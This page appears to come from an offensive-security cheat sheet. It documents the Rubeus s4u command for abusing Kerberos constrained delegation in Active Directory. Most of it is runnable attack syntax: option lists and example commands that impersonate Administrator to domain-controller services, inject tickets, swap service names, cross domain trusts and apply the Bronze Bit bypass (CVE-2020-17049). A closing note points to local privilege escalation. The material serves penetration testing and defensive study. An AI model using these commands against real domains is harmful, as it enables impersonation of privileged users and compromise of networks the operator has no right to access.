🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🎟️ Rubeus / s4u

s4u

Perform S4U2self and/or S4U2proxy constrained delegation abuse. Used to impersonate any user to services an account is configured to delegate to.

Usage

# Using existing TGT
Rubeus.exe s4u </ticket:<ticket> | /ticket:<file>.kirbi> </impersonateuser:<username> | /tgs:<ticket> | /tgs:<file>.kirbi> /msdsspn:<spn> [/altservice:<spn>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/opsec] [/self] [/proxyurl:<url>] [/createnetonly:C:\Windows\System32\cmd.exe] [/show]

# Using account hash (auto-requests TGT first)
Rubeus.exe s4u /user:<username> </rc4:<rc4> | /aes256:<aes256-key>> [/domain:<domain>] </impersonateuser:<username> | /tgs:<ticket>...> /msdsspn:<spn> [/altservice:<spn>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac] [/proxyurl:<url>]

# Cross-domain S4U
Rubeus.exe s4u /user:<username> </rc4:<rc4> | /aes256:<aes256-key>> [/domain:<domain>] </impersonateuser:<username>...> /msdsspn:<spn> /targetdomain:<domain> /targetdc:<dc-fqdn> [/altservice:<spn>] [/dc:<dc-ip>] [/nowrap] [/self] [/nopac]

Options

  • /ticket:<ticket> β€” existing TGT (base64 or .kirbi path)
  • /user:<username> β€” account with constrained delegation configured
  • /rc4:<rc4> β€” RC4/NTLM hash of the account
  • /aes256:<aes256-key> β€” AES256 key of the account
  • /domain:<domain> β€” domain of the account
  • /impersonateuser:<username> β€” user to impersonate (required)
  • /msdsspn:<spn> β€” target SPN in msds-allowedtodelegateto
  • /tgs:<ticket> β€” S4U2self TGS to use for S4U2proxy step
  • /altservice:<spn> β€” substitute alternate service name in final ticket (sname swap)
  • /dc:<dc-ip> β€” domain controller to target
  • /ptt β€” pass-the-ticket, apply final ticket to current session
  • /outfile:<output> β€” save ticket to file
  • /nowrap β€” don't line-wrap
  • /opsec β€” form requests inline with genuine traffic (AES256 only)
  • /self β€” S4U2self only (no S4U2proxy)
  • /bronzebit β€” flip forwardable flag (CVE-2020-17049); requires service key
  • /nopac β€” request initial TGT without PAC
  • /targetdomain:<domain> β€” cross-domain target domain
  • /targetdc:<dc-fqdn> β€” cross-domain target DC
  • /createnetonly:<exe> β€” apply ticket to sacrificial process
  • /proxyurl:<url> β€” KDC proxy URL

Examples

# Full chain: TGT request + S4U2self + S4U2proxy + inject
Rubeus.exe s4u /user:<username> /rc4:<rc4> /impersonateuser:Administrator /msdsspn:"ldap/<dc-ip>" /altservice:cifs /ptt

# Supply existing TGT, run S4U2self only
Rubeus.exe s4u /ticket:<ticket> /impersonateuser:Administrator

# Supply TGT + S4U2self TGS, run S4U2proxy
Rubeus.exe s4u /ticket:<ticket> /msdsspn:"ldap/<computer>.<domain>" /tgs:<ticket>

# Cross-domain S4U
Rubeus.exe s4u /user:<username> /aes256:<aes256-key> /domain:<domain> /impersonateuser:<target-user> /msdsspn:<spn> /targetdomain:<domain> /targetdc:<dc-fqdn>

# S4U2self referral (forge, no S4U2proxy)
Rubeus.exe s4u /self /targetdomain:<domain> /dc:<dc-ip> /impersonateuser:<username> /domain:<domain> /altservice:host/<computer>.<domain> /nowrap /ticket:<ticket>

# Bronze Bit (CVE-2020-17049)
Rubeus.exe s4u /user:<username> /aes256:<aes256-key> /impersonateuser:<target-user> /msdsspn:<spn> /bronzebit /ptt

Notes

  • Account needs TrustedToAuthForDelegation in userAccountControl and a value in msds-allowedtodelegateto
  • /altservice exploits Alberto Solino's sname-not-protected-in-KRB-CRED discovery β€” server name IS protected, service name is NOT
  • Multiple altservices: /altservice:cifs,HOST,ldap
  • /self + /altservice useful for local privilege escalation (delegate-to-self abuse)